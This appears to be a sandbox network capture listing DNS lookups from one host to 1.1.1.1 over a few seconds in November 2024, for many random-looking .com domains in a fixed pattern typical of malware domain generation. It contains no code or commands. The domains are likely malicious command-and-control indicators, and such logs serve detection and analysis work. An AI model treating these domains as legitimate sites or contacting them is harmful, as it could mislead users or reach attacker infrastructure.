Nov 11, 2024 18:14:01.952126026 CET	192.168.2.6	1.1.1.1	0xa36d	Standard query (0)	gatyfuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:01.952683926 CET	192.168.2.6	1.1.1.1	0x3ed0	Standard query (0)	lyvyxin.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.001391888 CET	192.168.2.6	1.1.1.1	0x225	Standard query (0)	pujywep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.003057003 CET	192.168.2.6	1.1.1.1	0xfa40	Standard query (0)	vonypic.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.003829956 CET	192.168.2.6	1.1.1.1	0x9d3b	Standard query (0)	galykew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.005373955 CET	192.168.2.6	1.1.1.1	0xdf59	Standard query (0)	lysynun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.007469893 CET	192.168.2.6	1.1.1.1	0x85b2	Standard query (0)	lyvytud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.009541035 CET	192.168.2.6	1.1.1.1	0x22e3	Standard query (0)	volyqam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.010463953 CET	192.168.2.6	1.1.1.1	0xa64f	Standard query (0)	puvytuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.010905981 CET	192.168.2.6	1.1.1.1	0x7c23	Standard query (0)	qetyveq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.011624098 CET	192.168.2.6	1.1.1.1	0x2fd7	Standard query (0)	qebytuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.011692047 CET	192.168.2.6	1.1.1.1	0x8995	Standard query (0)	vopybym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.011918068 CET	192.168.2.6	1.1.1.1	0xbb14	Standard query (0)	lykyjar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012105942 CET	192.168.2.6	1.1.1.1	0xd3b2	Standard query (0)	ganypis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012284994 CET	192.168.2.6	1.1.1.1	0x1fc1	Standard query (0)	lyryvaj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012489080 CET	192.168.2.6	1.1.1.1	0x63f9	Standard query (0)	volykek.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012689114 CET	192.168.2.6	1.1.1.1	0x1cc2	Standard query (0)	lyryfyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.012901068 CET	192.168.2.6	1.1.1.1	0x763e	Standard query (0)	vocyzum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.013128996 CET	192.168.2.6	1.1.1.1	0x3f0d	Standard query (0)	gadynub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.013257027 CET	192.168.2.6	1.1.1.1	0x3585	Standard query (0)	vojyjot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.013501883 CET	192.168.2.6	1.1.1.1	0xab5b	Standard query (0)	qetyfyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.013817072 CET	192.168.2.6	1.1.1.1	0xf432	Standard query (0)	pujyjol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.014141083 CET	192.168.2.6	1.1.1.1	0xcd09	Standard query (0)	gatyveh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.068459988 CET	192.168.2.6	1.1.1.1	0x3e45	Standard query (0)	qedynug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.074038982 CET	192.168.2.6	1.1.1.1	0xa9a3	Standard query (0)	puvyxig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.078608036 CET	192.168.2.6	1.1.1.1	0xe9a5	Standard query (0)	gahyqas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.088435888 CET	192.168.2.6	1.1.1.1	0xc76	Standard query (0)	vojyqac.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.090764999 CET	192.168.2.6	1.1.1.1	0x34cf	Standard query (0)	lymysox.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.090951920 CET	192.168.2.6	1.1.1.1	0x1e29	Standard query (0)	vowydet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.091115952 CET	192.168.2.6	1.1.1.1	0xf919	Standard query (0)	gacyzuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.091494083 CET	192.168.2.6	1.1.1.1	0x9409	Standard query (0)	qegyhip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.091636896 CET	192.168.2.6	1.1.1.1	0xec0a	Standard query (0)	qebyxog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.091778994 CET	192.168.2.6	1.1.1.1	0xce27	Standard query (0)	pumypop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.091918945 CET	192.168.2.6	1.1.1.1	0x9469	Standard query (0)	qegyqov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.092053890 CET	192.168.2.6	1.1.1.1	0xf65	Standard query (0)	puzylyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.092200994 CET	192.168.2.6	1.1.1.1	0x85e0	Standard query (0)	qeqysap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.092327118 CET	192.168.2.6	1.1.1.1	0x9130	Standard query (0)	vofymif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.092478037 CET	192.168.2.6	1.1.1.1	0xbcf3	Standard query (0)	lyxylyj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.093683004 CET	192.168.2.6	1.1.1.1	0x1487	Standard query (0)	pufymiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.093888998 CET	192.168.2.6	1.1.1.1	0x4245	Standard query (0)	gaqydaz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.094439983 CET	192.168.2.6	1.1.1.1	0xfbf8	Standard query (0)	qexyluq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.096237898 CET	192.168.2.6	1.1.1.1	0xffe8	Standard query (0)	purydel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.096395969 CET	192.168.2.6	1.1.1.1	0xcb68	Standard query (0)	lygymod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.869986057 CET	192.168.2.6	1.1.1.1	0xda1	Standard query (0)	ganyzuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.871819973 CET	192.168.2.6	1.1.1.1	0xfbfa	Standard query (0)	lyvylyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.873728991 CET	192.168.2.6	1.1.1.1	0x1ca9	Standard query (0)	gatydab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.874281883 CET	192.168.2.6	1.1.1.1	0x1314	Standard query (0)	vojymuk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.874614954 CET	192.168.2.6	1.1.1.1	0xe7af	Standard query (0)	qetysog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.874902010 CET	192.168.2.6	1.1.1.1	0x5b68	Standard query (0)	qekyqoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.875474930 CET	192.168.2.6	1.1.1.1	0xc0e2	Standard query (0)	qebylyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.875597000 CET	192.168.2.6	1.1.1.1	0x7be2	Standard query (0)	pupydev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.876231909 CET	192.168.2.6	1.1.1.1	0x4ed0	Standard query (0)	vonyzut.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.876980066 CET	192.168.2.6	1.1.1.1	0xec3b	Standard query (0)	pufybyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.877547979 CET	192.168.2.6	1.1.1.1	0x1a39	Standard query (0)	vopydaf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.877625942 CET	192.168.2.6	1.1.1.1	0x1d55	Standard query (0)	puryxuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.878165007 CET	192.168.2.6	1.1.1.1	0x4642	Standard query (0)	pujymiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.878197908 CET	192.168.2.6	1.1.1.1	0xfe6e	Standard query (0)	lykymij.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.878804922 CET	192.168.2.6	1.1.1.1	0xe022	Standard query (0)	gadydow.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.880897999 CET	192.168.2.6	1.1.1.1	0xc5aa	Standard query (0)	gahyfyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.881531000 CET	192.168.2.6	1.1.1.1	0xe3b0	Standard query (0)	puzymup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.882221937 CET	192.168.2.6	1.1.1.1	0x420e	Standard query (0)	qeqylyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.882708073 CET	192.168.2.6	1.1.1.1	0x5aa6	Standard query (0)	vofydak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.883635044 CET	192.168.2.6	1.1.1.1	0x8938	Standard query (0)	lyxymix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.883817911 CET	192.168.2.6	1.1.1.1	0xcdd8	Standard query (0)	gaqyzyb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.887965918 CET	192.168.2.6	1.1.1.1	0xb732	Standard query (0)	qexyqip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.899918079 CET	192.168.2.6	1.1.1.1	0x77ae	Standard query (0)	qegyfeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.901166916 CET	192.168.2.6	1.1.1.1	0x4429	Standard query (0)	vowyzuf.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.902456999 CET	192.168.2.6	1.1.1.1	0x1c55	Standard query (0)	vocyqot.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.902518034 CET	192.168.2.6	1.1.1.1	0x3486	Standard query (0)	pufydaq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.904618025 CET	192.168.2.6	1.1.1.1	0x1649	Standard query (0)	lyryxud.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.918070078 CET	192.168.2.6	1.1.1.1	0x9787	Standard query (0)	lygyfej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.921360970 CET	192.168.2.6	1.1.1.1	0xa7c3	Standard query (0)	gacyqoz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.974509954 CET	192.168.2.6	1.1.1.1	0xa6f4	Standard query (0)	vocykec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.974510908 CET	192.168.2.6	1.1.1.1	0x1f67	Standard query (0)	lyryson.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.974806070 CET	192.168.2.6	1.1.1.1	0x3a58	Standard query (0)	lyxyjod.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.974960089 CET	192.168.2.6	1.1.1.1	0xca0c	Standard query (0)	qexykav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975086927 CET	192.168.2.6	1.1.1.1	0x25e2	Standard query (0)	vofybet.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975263119 CET	192.168.2.6	1.1.1.1	0xc2fc	Standard query (0)	qegynul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975332975 CET	192.168.2.6	1.1.1.1	0x8958	Standard query (0)	purypig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975667000 CET	192.168.2.6	1.1.1.1	0x2fd0	Standard query (0)	lygynyr.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975827932 CET	192.168.2.6	1.1.1.1	0x424	Standard query (0)	pumytyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.975989103 CET	192.168.2.6	1.1.1.1	0x1672	Standard query (0)	lyvywar.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.976139069 CET	192.168.2.6	1.1.1.1	0x434b	Standard query (0)	qeqytuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.976288080 CET	192.168.2.6	1.1.1.1	0x671	Standard query (0)	volyjif.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.976425886 CET	192.168.2.6	1.1.1.1	0x58b6	Standard query (0)	qedyvap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.976576090 CET	192.168.2.6	1.1.1.1	0x8f72	Standard query (0)	galyhib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:02.981080055 CET	192.168.2.6	1.1.1.1	0xf17a	Standard query (0)	qekyhug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.015863895 CET	192.168.2.6	1.1.1.1	0xb9d5	Standard query (0)	lysyvax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.020931959 CET	192.168.2.6	1.1.1.1	0x8e1	Standard query (0)	gacykas.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.021554947 CET	192.168.2.6	1.1.1.1	0xf693	Standard query (0)	ganyrew.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.021924019 CET	192.168.2.6	1.1.1.1	0x5441	Standard query (0)	lykygun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.023900986 CET	192.168.2.6	1.1.1.1	0xb0c3	Standard query (0)	pupycop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.025027037 CET	192.168.2.6	1.1.1.1	0x8b8d	Standard query (0)	vonyryk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.025298119 CET	192.168.2.6	1.1.1.1	0xcd67	Standard query (0)	gatycis.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.027074099 CET	192.168.2.6	1.1.1.1	0x6480	Standard query (0)	vopycoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.027290106 CET	192.168.2.6	1.1.1.1	0xe461	Standard query (0)	qebyrel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.027323961 CET	192.168.2.6	1.1.1.1	0x931a	Standard query (0)	pujygug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.027544975 CET	192.168.2.6	1.1.1.1	0xf178	Standard query (0)	qetyxiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.027642965 CET	192.168.2.6	1.1.1.1	0x4d9a	Standard query (0)	puvywal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.028691053 CET	192.168.2.6	1.1.1.1	0x571b	Standard query (0)	gahynuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.046859980 CET	192.168.2.6	1.1.1.1	0x211	Standard query (0)	gaqypuh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.047256947 CET	192.168.2.6	1.1.1.1	0x4692	Standard query (0)	vojygym.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.056327105 CET	192.168.2.6	1.1.1.1	0xedb	Standard query (0)	puvylep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.056570053 CET	192.168.2.6	1.1.1.1	0x39d2	Standard query (0)	gadyvez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.115113020 CET	192.168.2.6	1.1.1.1	0xfbce	Standard query (0)	puzyjov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.115159988 CET	192.168.2.6	1.1.1.1	0x2ffb	Standard query (0)	lymytuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:03.116687059 CET	192.168.2.6	1.1.1.1	0x353f	Standard query (0)	vowypim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.725248098 CET	192.168.2.6	1.1.1.1	0x367d	Standard query (0)	lysysir.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.725302935 CET	192.168.2.6	1.1.1.1	0xd01c	Standard query (0)	qedysol.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.725824118 CET	192.168.2.6	1.1.1.1	0x1530	Standard query (0)	galynus.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.726454020 CET	192.168.2.6	1.1.1.1	0x2f87	Standard query (0)	qekynyv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.727231026 CET	192.168.2.6	1.1.1.1	0x3fed	Standard query (0)	vonykam.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.727617025 CET	192.168.2.6	1.1.1.1	0xbae5	Standard query (0)	lymylen.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.727749109 CET	192.168.2.6	1.1.1.1	0xaa7f	Standard query (0)	pumyleg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.728315115 CET	192.168.2.6	1.1.1.1	0xe54c	Standard query (0)	volymuc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.730294943 CET	192.168.2.6	1.1.1.1	0x177a	Standard query (0)	pupypil.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.739013910 CET	192.168.2.6	1.1.1.1	0x8705	Standard query (0)	vopyput.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.742593050 CET	192.168.2.6	1.1.1.1	0xdb7d	Standard query (0)	pufypuv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.744281054 CET	192.168.2.6	1.1.1.1	0x91e9	Standard query (0)	vowykat.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.744750023 CET	192.168.2.6	1.1.1.1	0x7d09	Standard query (0)	qexynyq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.748967886 CET	192.168.2.6	1.1.1.1	0x2b0a	Standard query (0)	lygysid.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.765072107 CET	192.168.2.6	1.1.1.1	0x6907	Standard query (0)	gacynyh.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.773086071 CET	192.168.2.6	1.1.1.1	0xa335	Standard query (0)	purylal.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.779829025 CET	192.168.2.6	1.1.1.1	0x8b7a	Standard query (0)	qegysiv.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.783617973 CET	192.168.2.6	1.1.1.1	0x5a23	Standard query (0)	vocymum.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.785326004 CET	192.168.2.6	1.1.1.1	0x437a	Standard query (0)	puzygyl.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.787760019 CET	192.168.2.6	1.1.1.1	0xe9b9	Standard query (0)	qedyxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.789154053 CET	192.168.2.6	1.1.1.1	0xc962	Standard query (0)	vocyjik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.791130066 CET	192.168.2.6	1.1.1.1	0x30eb	Standard query (0)	gacyhuw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.793106079 CET	192.168.2.6	1.1.1.1	0x872d	Standard query (0)	vofycim.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.793482065 CET	192.168.2.6	1.1.1.1	0xec4a	Standard query (0)	gadycih.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.794636965 CET	192.168.2.6	1.1.1.1	0x1232	Standard query (0)	lyxygur.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.795175076 CET	192.168.2.6	1.1.1.1	0xc3dd	Standard query (0)	galyfez.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.831319094 CET	192.168.2.6	1.1.1.1	0x6f88	Standard query (0)	gahyvab.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.831765890 CET	192.168.2.6	1.1.1.1	0xb178	Standard query (0)	qekyfep.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.831971884 CET	192.168.2.6	1.1.1.1	0xdc7c	Standard query (0)	pufycog.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.832165003 CET	192.168.2.6	1.1.1.1	0x7f69	Standard query (0)	lygyvon.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.832477093 CET	192.168.2.6	1.1.1.1	0x88f7	Standard query (0)	lyrytyx.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.834511995 CET	192.168.2.6	1.1.1.1	0x7eb6	Standard query (0)	vonyqof.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.834997892 CET	192.168.2.6	1.1.1.1	0xd0e3	Standard query (0)	gaqyres.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.835161924 CET	192.168.2.6	1.1.1.1	0xc375	Standard query (0)	pumywov.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.835294962 CET	192.168.2.6	1.1.1.1	0xaa84	Standard query (0)	qexyhul.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.835453987 CET	192.168.2.6	1.1.1.1	0xbad6	Standard query (0)	qetylel.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.835613012 CET	192.168.2.6	1.1.1.1	0x68b7	Standard query (0)	purytyp.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.835747957 CET	192.168.2.6	1.1.1.1	0xae03	Standard query (0)	vowyrec.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.836044073 CET	192.168.2.6	1.1.1.1	0x88d6	Standard query (0)	lymywad.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.836245060 CET	192.168.2.6	1.1.1.1	0x82f1	Standard query (0)	gahydos.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.836421967 CET	192.168.2.6	1.1.1.1	0x1a72	Standard query (0)	lysyxuj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.836729050 CET	192.168.2.6	1.1.1.1	0x9813	Standard query (0)	ganyqib.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.836905003 CET	192.168.2.6	1.1.1.1	0x6339	Standard query (0)	puvymug.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837054014 CET	192.168.2.6	1.1.1.1	0xe991	Standard query (0)	lykyfax.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837207079 CET	192.168.2.6	1.1.1.1	0x1b2d	Standard query (0)	vopyzyk.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837371111 CET	192.168.2.6	1.1.1.1	0x2d72	Standard query (0)	qebyqig.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837559938 CET	192.168.2.6	1.1.1.1	0x6cee	Standard query (0)	pujydap.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837817907 CET	192.168.2.6	1.1.1.1	0x6707	Standard query (0)	gatyzyw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.837975025 CET	192.168.2.6	1.1.1.1	0x6167	Standard query (0)	lyvymun.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.838387966 CET	192.168.2.6	1.1.1.1	0xc61e	Standard query (0)	vojydoc.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.838537931 CET	192.168.2.6	1.1.1.1	0x43f3	Standard query (0)	pupyxuq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.841815948 CET	192.168.2.6	1.1.1.1	0x5372	Standard query (0)	volygyt.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.842273951 CET	192.168.2.6	1.1.1.1	0x4971	Standard query (0)	qegyvag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.844564915 CET	192.168.2.6	1.1.1.1	0x5e3	Standard query (0)	lyryler.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.846040964 CET	192.168.2.6	1.1.1.1	0x6ee7	Standard query (0)	qeqyrav.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.865886927 CET	192.168.2.6	1.1.1.1	0xec76	Standard query (0)	ganykah.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866157055 CET	192.168.2.6	1.1.1.1	0x7734	Standard query (0)	lykynyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866321087 CET	192.168.2.6	1.1.1.1	0x9b75	Standard query (0)	qetytup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866336107 CET	192.168.2.6	1.1.1.1	0x5206	Standard query (0)	gatypuz.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866517067 CET	192.168.2.6	1.1.1.1	0x3554	Standard query (0)	qebykoq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.866808891 CET	192.168.2.6	1.1.1.1	0xcd0c	Standard query (0)	pujybev.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.867002964 CET	192.168.2.6	1.1.1.1	0xaf73	Standard query (0)	vojybef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.996392012 CET	192.168.2.6	1.1.1.1	0xe0c1	Standard query (0)	lyvyjoj.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:04.996710062 CET	192.168.2.6	1.1.1.1	0xd766	Standard query (0)	puvyjiq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.107526064 CET	192.168.2.6	1.1.1.1	0x9cbe	Standard query (0)	puzybeq.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.112737894 CET	192.168.2.6	1.1.1.1	0xecfb	Standard query (0)	vocygef.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.112950087 CET	192.168.2.6	1.1.1.1	0xd171	Standard query (0)	qegyxup.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.113291979 CET	192.168.2.6	1.1.1.1	0x1aee	Standard query (0)	qeqykop.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.117867947 CET	192.168.2.6	1.1.1.1	0x5fff	Standard query (0)	lygyxux.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.123681068 CET	192.168.2.6	1.1.1.1	0x3995	Standard query (0)	qexyfag.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.124139071 CET	192.168.2.6	1.1.1.1	0x4499	Standard query (0)	gaqyqiw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.127585888 CET	192.168.2.6	1.1.1.1	0x104a	Standard query (0)	vowyqik.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.129592896 CET	192.168.2.6	1.1.1.1	0xd031	Standard query (0)	gacyfeb.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.130697012 CET	192.168.2.6	1.1.1.1	0x32ff	Standard query (0)	pumyjip.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.131465912 CET	192.168.2.6	1.1.1.1	0x7d8a	Standard query (0)	galyvaw.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.131668091 CET	192.168.2.6	1.1.1.1	0xb71	Standard query (0)	lysytyn.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.132314920 CET	192.168.2.6	1.1.1.1	0x895e	Standard query (0)	lyxynej.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.133021116 CET	192.168.2.6	1.1.1.1	0x1ea2	Standard query (0)	gadypub.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.133120060 CET	192.168.2.6	1.1.1.1	0xaa76	Standard query (0)	lymyjix.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.133790016 CET	192.168.2.6	1.1.1.1	0xa69d	Standard query (0)	volybak.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.134890079 CET	192.168.2.6	1.1.1.1	0x49f5	Standard query (0)	qedytyg.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.155214071 CET	192.168.2.6	1.1.1.1	0x9400	Standard query (0)	lyvygyd.com	A (IP address)	IN (0x0001)	false
Nov 11, 2024 18:14:06.155849934 CET	192.168.2.6	1.1.1.1	0xc44c	Standard query (0)	vonyjuc.com	A (IP address)	IN (0x0001)	false
